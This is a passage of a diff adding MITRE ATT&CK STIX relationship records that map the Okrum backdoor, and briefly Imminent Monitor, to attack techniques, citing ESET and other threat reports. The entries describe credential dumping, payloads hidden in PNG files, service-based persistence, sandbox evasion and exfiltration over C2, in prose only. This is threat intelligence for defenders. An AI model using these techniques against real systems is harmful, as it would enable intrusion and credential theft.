+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) can identify proxy servers configured and used by the victim, and use it to make HTTP requests to C2 its server.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--95e5fd0e-b9c1-4efa-b462-a922456401e6",
+ "type": "relationship",
+ "modified": "2020-05-07T17:54:13.483Z",
+ "created": "2020-05-06T21:31:07.341Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439)'s payload is encrypted and embedded within its loader, or within a legitimate PNG file.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--54ece776-8a64-4e0c-9d54-4350680c07b8",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.563Z",
+ "created": "2020-05-06T21:31:07.563Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) has used a custom implementation of AES encryption to encrypt collected data.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--cebe7625-3bb7-4353-9b48-cd4251410968",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.578Z",
+ "created": "2020-05-06T21:31:07.578Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "Before exfiltration, [Okrum](https://attack.mitre.org/software/S0439)'s backdoor has used hidden files to store logs and outputs from backdoor commands.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8c77a88d-1390-4736-b7c9-f902b62d7f45",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.590Z",
+ "created": "2020-05-06T21:31:07.590Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) was seen using a RAR archiver tool to compress/decompress data.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--0b582433-b5e6-49d7-886c-e1edd1a0a802",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.597Z",
+ "created": "2020-05-06T21:31:07.597Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439)'s backdoor deletes files after they have been successfully uploaded to C2 servers.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--bf603371-ff65-4b57-b80a-4f93daafbed6",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.613Z",
+ "created": "2020-05-06T21:31:07.613Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) was seen using modified Quarks PwDump to perform credential dumping.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--060d2cd5-a734-4c78-908c-a9ddabe3aa89",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.558Z",
+ "created": "2020-05-06T21:31:07.558Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439)'s installer can attempt to achieve persistence by creating a scheduled task.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--40fad687-982e-4cd3-955c-3c458e34e5df",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.573Z",
+ "created": "2020-05-06T21:31:07.573Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) was seen using a keylogger tool to capture keystrokes. (Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d96d964f-fec6-475e-acc5-d25ff0d46af9",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.621Z",
+ "created": "2020-05-06T21:31:07.621Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "To establish persistence, [Okrum](https://attack.mitre.org/software/S0439) can install itself as a new service named NtmSsvc.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2ef7a9cd-aba5-4360-9a8f-f6b58ff4492d",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.594Z",
+ "created": "2020-05-06T21:31:07.593Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439)'s loader can create a new service named NtmsSvc to execute the payload.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8483ad9a-84c9-4c83-a4d7-d403e44735dc",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.617Z",
+ "created": "2020-05-06T21:31:07.617Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) can collect the victim username.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6d8147e4-fca3-4348-9376-dd96cc7b9e30",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.554Z",
+ "created": "2020-05-06T21:31:07.554Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) was seen using MimikatzLite to perform credential dumping.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f89f5b59-9a3d-4f3a-9740-2bc1e063b752",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.587Z",
+ "created": "2020-05-06T21:31:07.587Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439)'s loader can detect presence of an emulator by using two calls to GetTickCount API, and checking whether the time has been accelerated.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2abdb5f5-6ff1-4f05-b925-429595011475",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.610Z",
+ "created": "2020-05-06T21:31:07.610Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439)'s loader can decrypt the backdoor code, embedded within the loader or within a legitimate PNG file. A custom XOR cipher or RC4 is used for decryption.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b3f66735-fafe-49be-b55c-4d087d1351a7",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.642Z",
+ "created": "2020-05-06T21:31:07.642Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439)'s loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--108e61c1-83fc-4ebf-aa5c-4ff19ccbe7cf",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.631Z",
+ "created": "2020-05-06T21:31:07.631Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "Data exfiltration is done by [Okrum](https://attack.mitre.org/software/S0439) using the already opened channel with the C2 server.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--743a0baf-8d6d-4e4a-a72b-0413a5d49594",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.549Z",
+ "created": "2020-05-06T21:31:07.549Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) can collect computer name, locale information, and information about the OS and architecture.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--702ed555-03e2-4660-82d8-e85d46cbec02",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.650Z",
+ "created": "2020-05-06T21:31:07.650Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) was seen using NetSess to discover NetBIOS sessions.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ce48fd88-9fed-44d6-864f-07d8994c89d2",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.582Z",
+ "created": "2020-05-06T21:31:07.582Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) can collect network information, including the host IP address, DNS, and proxy information.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--39897b0a-f48b-4d3b-8ba0-d6f8f26d00d4",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.605Z",
+ "created": "2020-05-06T21:31:07.605Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) has used DriveLetterView to enumerate drive information.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8908a544-e6b6-485a-8251-6c8dd1fbc040",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.624Z",
+ "created": "2020-05-06T21:31:07.624Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) can establish persistence by adding a new service NtmsSvc with the display name Removable Storage to masquerade as a legitimate Removable Storage Manager.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--65f315be-e62d-44a5-b21a-7211041a75bb",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.654Z",
+ "created": "2020-05-06T21:31:07.654Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--874148d5-d7cb-43c2-905f-1582f90005f6",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.657Z",
+ "created": "2020-05-06T21:31:07.657Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) can obtain the date and time of the compromised system.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e6f9ae1e-7002-4c62-be60-f45eca42061e",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.647Z",
+ "created": "2020-05-06T21:31:07.647Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has uploaded a file containing debugger logs, network information and system information to the C2.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--aac7b4ce-93ee-4feb-83da-3b2600ad75b0",
+ "type": "relationship",
+ "modified": "2020-05-07T02:33:06.795Z",
+ "created": "2020-05-07T02:33:06.795Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has encrypted the spearphish attachments to avoid detection from email gateways; the debugger also encrypts information before sending to the C2.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c3aa5639-a8e1-4de3-8f39-cc98593973ed",
+ "type": "relationship",
+ "modified": "2020-05-11T17:17:00.379Z",
+ "created": "2020-05-07T02:33:06.892Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "Imminent Unit42 Dec2019",
+ "url": "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "description": "Unit 42. (2019, December 2). Imminent Monitor \u2013 a RAT Down Under. Retrieved May 5, 2020."
+ }
+ ],
